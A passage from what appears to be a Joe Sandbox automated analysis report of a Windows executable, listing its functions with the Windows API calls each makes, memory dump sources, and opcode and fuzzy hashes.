                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              • Opcode ID: 534f78cc75e69905aa590f5f72ea06b4d96943c08d0648b65e250b9e1585cff8
                                                                                                                                                                                                              • Instruction ID: 1dd379f2e32b6af84162afdbf950c5fab5bd6f84fe5e81279cbb2d0ae761b633
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 534f78cc75e69905aa590f5f72ea06b4d96943c08d0648b65e250b9e1585cff8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4E0E236200208FFDB01CF90CC02FDEBBBAFB09314F218058E91596260D775AA24EB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBB4F5 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: 8b3d29d4533e9c926e08be150d24285fc8a0de2419afc7145811fc654fa0281c
                                                                                                                                                                                                              • Instruction ID: fb3095ccf7d05ae25437ac9c9807eeb285e13567ebc730b9562d9c6f56d0e7a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b3d29d4533e9c926e08be150d24285fc8a0de2419afc7145811fc654fa0281c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39E02BB1204140ABD736B224C46ABFCE9E05B10300F5844CBB1082F381D7F5D985C71B
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB22EF Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(-0000002A,-0000002A,00BB228C), ref: 00BB22F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              • Opcode ID: f84517cc31e521667d0a4bf60009f634975dfdeb7ac92b2c38b1cc398e03fff6
                                                                                                                                                                                                              • Instruction ID: 2d0e4ebd988250c8ebef7cf245191b0074588fa8b05be85111add75c3e209b1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f84517cc31e521667d0a4bf60009f634975dfdeb7ac92b2c38b1cc398e03fff6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3D0C9310101228FCA681F28B8446D277D4AA12335321479EE0F5820E4E7A588839A50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC610B Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00BC6112
                                                                                                                                                                                                                • Part of subcall function 00BC5CF2: PostMessageA.USER32(00000001,00008001,00000000,00000000), ref: 00BC5D31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchMessagePost
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 678948607-0
                                                                                                                                                                                                              • Opcode ID: 43536f0b1d808c2e79a8954b5bdf31119e4bc5b18815d1e7fe8075be4bd75dde
                                                                                                                                                                                                              • Instruction ID: 86267dda5de0709dbe5587e8a465e177b8f2837531550133defb4e2b98df03ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43536f0b1d808c2e79a8954b5bdf31119e4bc5b18815d1e7fe8075be4bd75dde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BD06231911105DADB44FB94C94779DB6F09F00705F6041DDA104BB342D6755B858757
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB457F Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,00BC5CD2,?,00BC5CA6,?,00000012,00BE4B54,00000008,00BC6411,00000004,00BC622B,?,?,000000A4,00BCB95B), ref: 00BB4589
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              • Opcode ID: 13fd0427e47eaf05561a8d4bd3743777452fe5ce60f8ea813195365893b5f943
                                                                                                                                                                                                              • Instruction ID: 45391a63e1f3e2bdaf4b2cea1077c3811e3243132a3dcccb7dc2b0ce263a66df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13fd0427e47eaf05561a8d4bd3743777452fe5ce60f8ea813195365893b5f943
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D0C931125621CBE7715E24A8147E6B7E4BB24311F1144AE908481051FBF08880CA40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD0548 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD055B
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1353095263-0
                                                                                                                                                                                                              • Opcode ID: ade91ee8a1e1f879fcfac3a0c78c7d8d97f93fa3371e5ca2b20ace8538ad6864
                                                                                                                                                                                                              • Instruction ID: 5c10d4e8ffc85ecefca269e01448c9cd1485f94bd321d77ddf82ea532ad4b5aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ade91ee8a1e1f879fcfac3a0c78c7d8d97f93fa3371e5ca2b20ace8538ad6864
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7C08C31000208BBCB009B49C906E4EBBB8DB80364F200085F40017240EAB2EE009A80
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB26EF Relevance: 1.4, APIs: 1, Instructions: 124COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: cf1435e2a1d495416b583d1f730df2263d8df0746ad804ac12c604d50612707e
                                                                                                                                                                                                              • Instruction ID: b5f974c8f7f96da14920e43ffe4ad66fa9673b0a54bdcd6d3458aeda01a34214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf1435e2a1d495416b583d1f730df2263d8df0746ad804ac12c604d50612707e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A41BE319002258BCF14EBA5C8915FEB3F4EF14314B5448EAD862B7251EFB49D0287A5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB6EA6 Relevance: 1.3, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2407: ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB241D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BB6EDF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                                                                                              • Opcode ID: 956113a2bbaa2f49170f36f0125f84257340da110b991d59c3fe7b27bbfb3713
                                                                                                                                                                                                              • Instruction ID: 085384d3bc5fc81303983863318cf0ae223f32b40c6425e252e0719a622cde4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 956113a2bbaa2f49170f36f0125f84257340da110b991d59c3fe7b27bbfb3713
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7017C3660021AEBCB15CE14D840AFBB3F5FF45394B1041AAE806DB610DBB8ED11DBD0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC4F14 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,71499961,?,?,00000000,00BDA3BE,000000FF,?,00BC4F01,?,00000004,00000004,Function_0000660B,71499961), ref: 00BC4F4C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              • Opcode ID: 3a34fcf668d4ba7df4163e14157c0039bcd596906da0e423db111d69c25b1e82
                                                                                                                                                                                                              • Instruction ID: 8d77fee11958bb2d8e1447b9d34a55c6fa180070141efb91de4c2e458fe6f934
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a34fcf668d4ba7df4163e14157c0039bcd596906da0e423db111d69c25b1e82
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87F0A733544954FBC7158F08CC51F55F7E8F745B20F11423AE556D36D0DB75A801CA94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC08FC Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00BC4FB0,?,?,?,?,00BC516F,00000001), ref: 00BC090D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 4cf2f37a303b158b1b4521b4f50ae214d8ed2e236048d149df9c03405d9b4f5d
                                                                                                                                                                                                              • Instruction ID: 8836a5a71398dd2c2583182c2dd0f6ff3c790b3dff6d21a21ea8777a72f226f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cf2f37a303b158b1b4521b4f50ae214d8ed2e236048d149df9c03405d9b4f5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EB012B03F6205BDFE6813244D3FF6A21449744B8BF10409CB301E90C4FBE068009018
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC0945 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC0957
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                              • Opcode ID: d6e829607ac7bffe8e09e4c23e4d861f34650e615a0ff29f189a8675a6684a37
                                                                                                                                                                                                              • Instruction ID: 530b298e633293b7a62e1608617115a902dc99fcff0051b9ed119aff70df2cb0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6e829607ac7bffe8e09e4c23e4d861f34650e615a0ff29f189a8675a6684a37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFC09230165342EBEA61AB04CD1DF0ABBA0BB91741F21C819B2D4240F08BB05458CB05
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00BCC996 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCC9A2
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BCCA6E
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCCA8E
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BCCA98
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                              • Opcode ID: 3c7476bba35c6fc0eabbb65beae5c9ae99037384c2eb6abab5753b2f51a57a41
                                                                                                                                                                                                              • Instruction ID: 7c00e0c718c3d0b49f6f365497781dea882ac3538dc6909af5494f6902194426
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c7476bba35c6fc0eabbb65beae5c9ae99037384c2eb6abab5753b2f51a57a41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F63118B5D0521CDBDB10DFA4D999BCDBBF8AF18700F1041EAE40CAB250EB709A848F44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BCBE82 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BCC07F,00BDB2C0), ref: 00BCBE87
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00BCC07F,?,00BCC07F,00BDB2C0), ref: 00BCBE90
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00BCC07F,00BDB2C0), ref: 00BCBE9B
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00BCC07F,00BDB2C0), ref: 00BCBEA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              • Opcode ID: 9e436735abda10228bcc9994156a826b80dcd1c0687b88b4574e2347c977d970
                                                                                                                                                                                                              • Instruction ID: 4180001ca6e7a8b486fb9975492f8585aed8b7494d03d96d9ba40bebf72930f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e436735abda10228bcc9994156a826b80dcd1c0687b88b4574e2347c977d970
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD01231011108FBCB402BE1EC3CE48BF28FB05B02F024002F309A3020EF3144408B55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD1922 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD1A1A
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD1A24
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD1A31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                              • Opcode ID: 4b86b287a05ffdb70ba0495f67e17417406273e7530d02c0695b2b8d61a77234
                                                                                                                                                                                                              • Instruction ID: eb96c40f9f943bf0dc7d702b282e6c4d50f14da43d90cac8f8caf1b3e5ff6693
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b86b287a05ffdb70ba0495f67e17417406273e7530d02c0695b2b8d61a77234
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A31C27491122DABCB21DF68D889B89BBF8EF08710F5045DAE41CA7260EB349F818F44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC3EC5 Relevance: 3.3, APIs: 2, Instructions: 849COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: WaitForSingleObject.KERNEL32(?,000000FF,00BC5E12,?,?,?,?,-00000086,000001E4), ref: 00BB45A3
                                                                                                                                                                                                                • Part of subcall function 00BB45A0: GetLastError.KERNEL32(?,?,?,?,-00000086,000001E4), ref: 00BB45AE
